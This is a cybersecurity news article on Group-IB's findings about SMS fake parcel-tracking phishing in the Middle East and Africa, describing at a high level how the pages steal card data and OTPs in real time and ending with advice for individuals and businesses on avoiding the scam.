Every day, billions of people rely on postal and courier services to deliver everything from personal letters to online orders. This dependence has grown steadily alongside the global rise of e-commerce.
The 2024 Universal Postal Union report found that postal services now serve 7.3 billion people, and Statista recorded roughly 161 billion parcels shipped in 2022 alone. As this reliance deepens, so do the criminal schemes built around it.
Cybercriminals have turned this trust into a weapon through a fast-spreading tactic called the fake shipment tracking scam.
Victims receive an urgent SMS claiming their package could not be delivered, pushing them to click a link and update their address or pay a small handling fee.
The link leads to a polished fake courier website built to look official. Once the victim enters their details, scammers collect personal information, banking credentials, card numbers, and one-time passwords, leaving victims with little time to question what is happening.
Group-IB analysts identified a sharp surge in these scams across the Middle East and Africa (MEA), with activity tracked from early 2024 showing explosive growth through 2025.
Data gathered between December 2025 and February 2026 revealed Egypt as the most targeted country with 119 incidents, followed by South Africa with 20, Ghana with 7, and Kenya with 5.
Most affected industries in MEA (Source – Group-IB)
Postal services were the most abused sector with 115 confirmed cases, while financial services, telecommunications, and mobility platforms also faced repeated targeting.
These campaigns rely heavily on psychological pressure rather than technical complexity. Since delivery notifications have become routine, most people do not stop to question a text about a delayed parcel.
How fake shipment tracking scams work (Source – Group-IB)
Scammers count on this behavior, knowing that someone expecting a delivery is far more likely to click without thinking. The fake pages are built for mobile screens, making them difficult to separate from a real courier’s website.
Behind the scheme is a broader criminal infrastructure spanning multiple countries and using cheap, disposable domain extensions such as .xyz, .sbs, .shop, and .click. Analysis revealed shared IP addresses and overlapping hosting patterns pointing to coordinated activity.
Top TLDs most commonly used in this scheme (Source – Group-IB)
Group-IB researchers also noted characteristics strongly linked to Darcula, a Chinese-language Phishing-as-a-Service platform offering over 20,000 counterfeit domains and more than 200 ready-to-use phishing templates to criminal operators.
Real-Time Credential Theft Through Embedded Scripts
What makes this campaign technically dangerous is how it steals data the moment a victim starts typing. Group-IB’s HTML analysis of the phishing pages uncovered embedded scripts that open a WebSocket connection to an attacker-controlled server the instant a victim loads the page.
This connection works as a live data feed, transmitting every keystroke — including card numbers, CVV codes, and OTPs — directly to the attacker in real time, with victims having no indication their information is leaving their device.
The script also generates a unique UUID token for each victim session, meaning attackers track every individual separately, pointing to a large-scale organized operation.
Fake shipment tracking scams work because such tracking updates have become commonplace (Source – Group-IB)
Phishing pages are also designed to show full content only to mobile browsers, since most SMS links are opened on phones. Attackers further add URL masks such as index.html to make links look more legitimate while ensuring the malicious page loads properly on mobile devices.
Individuals should never click tracking links sent via SMS or messaging apps. Go directly to the official courier website and enter the tracking number manually.
Be cautious of messages demanding immediate payment or address updates, since real courier companies do not charge fees for redelivery. Report suspicious messages to your local cybersecurity authority or postal service.
Businesses should publish regular alerts about phishing campaigns impersonating their brand to keep customers informed.
Applying email authentication protocols such as DMARC, DKIM, and SPF helps prevent spoofed messages from reaching customers.
Partnering with mobile carriers to filter fraudulent SMS patterns and offering a public verification tool for tracking messages can significantly reduce how many customers fall victim to these scams.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Fake Shipment Tracking Scams Surge in MEA, Stealing Banking Data Through Real-Time Phishing appeared first on Cyber Security News.
